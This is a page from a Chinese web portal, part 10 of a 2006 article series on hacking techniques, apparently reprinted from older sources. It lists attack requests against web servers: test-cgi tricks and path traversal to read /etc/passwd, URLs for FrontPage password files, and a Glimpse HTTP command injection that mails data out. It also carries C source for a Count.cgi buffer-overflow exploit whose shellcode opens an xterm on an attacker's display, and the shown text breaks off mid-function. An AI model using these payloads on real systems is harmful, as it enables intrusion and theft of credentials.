黑客攻防技术内幕-安全防入侵与防病毒基础(10) - 网络应用 - 网络知识 - 华夏媒体华夏媒体人 - 媒体、艺术、设计、技术与一体的门户

会员名称：密码：验证码：

会员注册忘记密码？

■ 设为首页
■ 加入收藏
■ 返回首页

媒体资讯>> 业界资讯 - 会展动态 - 竞赛&活动 - IT互联网媒体学院>> 图形图像 - 网页制作 - 网络编程 - 数据库 - 服务器 - 网络应用作品赏析>> 视频音响 - CG动画 - UI设计 - 平面设计 - 网页设计 - 摄影映象 - 三维2D - 其它设计媒体工作室>> 视频影像 - 音频声响 - 三维2D - 平面视觉 - 软硬技术 - 摄影映象人物访谈>> 人物访谈 - 华夏新锐媒体杂志>> 媒体杂志素材图库>> 丽景佳图 - 设计素材 - 资料图库 - 矢量图库 - 动态动画 - 特色图标酷站赏析>> 韩国网站 - 国外网站 - 国内网站会员中心>> 会员注册 - 会员登陆

当前位置：华夏媒体 - > 媒体学院 - > 网络应用 - > 网络知识 - > 黑客攻防技术内幕-安全防入侵与防病毒基础(10)

黑客攻防技术内... [网络...]

More...

网络协议X档案... [其它...]

不可忽视的BIO... [其它...]

微软IE浏览器非... [其它...]

微软IE浏览器非... [其它...]

网管十招 [其它...]

微软安全问题 ... [其它...]

修改注册表使电... [其它...]

利用注册表管理... [其它...]

有关IIS HACK的... [其它...]

黑客攻防技术内幕-安全防入侵与防病毒基础(10)

编辑：华夏媒体作者：未知来源：网络时间：2006-07-29 总浏览量：2267

文字大小：[ 大中小 ] 文字颜色：双击滚屏/单击停止

[上一页] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [下一页]

text/html, text/x-html

PATH_INFO =

PATH_TRANSLATED =

SCRIPT_NAME = /cgi-bin/test-cgi

QUERY_STRING = whatever

REMOTE_HOST = xxxx.xxxx.gov

REMOTE_ADDR = 200.200.200.200

REMOTE_USER =

AUTH_TYPE =

CONTENT_TYPE =

CONTENT_LENGTH =

得到一些http的目录：

lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd

有时可能也不管用，可尝试：

lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*

还可以这样尝试：

GET /cgi-bin/test-cgi?* HTTP/1.0

GET /cgi-bin/test-cgi?x *

GET /cgi-bin/nph-test-cgi?* HTTP/1.0

GET /cgi-bin/nph-test-cgi?x *

GET /cgi-bin/test-cgi?x HTTP/1.0 *

GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

● 对于某些BSD的apache可以：

lynx http://server/root/etc/passwd

lynx http://server/~root/etc/passwd

● htmlscript

lynx http://server/cgi-bin/htmlscript?../../../../etc/passwd

● Frontpage extensions

如果读http://www.victim.com/_vti_inf.html将得到FP extensions的版本和它在服务器上的路径，还有一些密码文件，如：

http://server/_vti_pvt/service.pwd

http://server/_vti_pvt/users.pwd

http://server/_vti_pvt/authors.pwd

http://server/_vti_pvt/administrators.pwd

● Vulnerability in Glimpse HTTP

telnet target.machine.com 80

GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\MD;echo HTTP/1.0

● Count.cgi

该程序只对Count.cgi 24以下版本有效：

/*### count.c ########################################################*/

#include

/* Forwards */

unsigned long getsp(int);

int usage(char *);

void doit(char *,long, char *);

/* Constants */

char shell[]=

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"

"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"

"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"

"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"

"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

"/usr/X11R6/bin/xterm0-ut0-display0";

char endpad[]=

"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

int main (int argc, char *argv[]){

char *shellcode = NULL;

int cnt,ver,retcount, dispnum,dotquads[4],offset;

unsigned long sp;

char dispname[255];

char *host;

offset = sp = cnt = ver = 0;

fprintf(stderr,"\t%s - Gus\n",argv[0]);

if (argc<3) usage(argv[0]);

while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) {

switch(cnt){

case 'h':

host = optarg;

break;

case 'd':

{

retcount = sscanf(optarg, "%d.%d.%d.%d:%d",

&dotquads[0],

&dotquads[1],

&dotquads[2],

dotquads[3], &dispnum);

if (retcount != 5) usage(argv[0]);

sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",

dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);

shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));

sprintf(shellcode,"%s%s%s",shell,dispname,endpad);

}

break;

case 'v':

ver = atoi(optarg);

break;

case 'o':

offset = atoi(optarg);

break;

default:

usage(argv[0]);

break;

}

sp = offset + getsp(ver);

(void)doit(host,sp,shellcode);

exit(0);

}

unsigned long getsp(int ver) {

/* Get the stack pointer we should be using. YMMV. If it does not work,

try using -o X, where x is between -1500 and 1500 */

unsigned long sp=0;

if (ver == 15) sp = 0xbfffea50;

if (ver == 20) sp = 0xbfffea50;

if (ver == 22) sp = 0xbfffeab4;

if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */

if (sp == 0) {

fprintf(stderr,"I don't have an sp for that version try using the -o option.

[上一页] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [下一页]

打印收藏关闭至顶部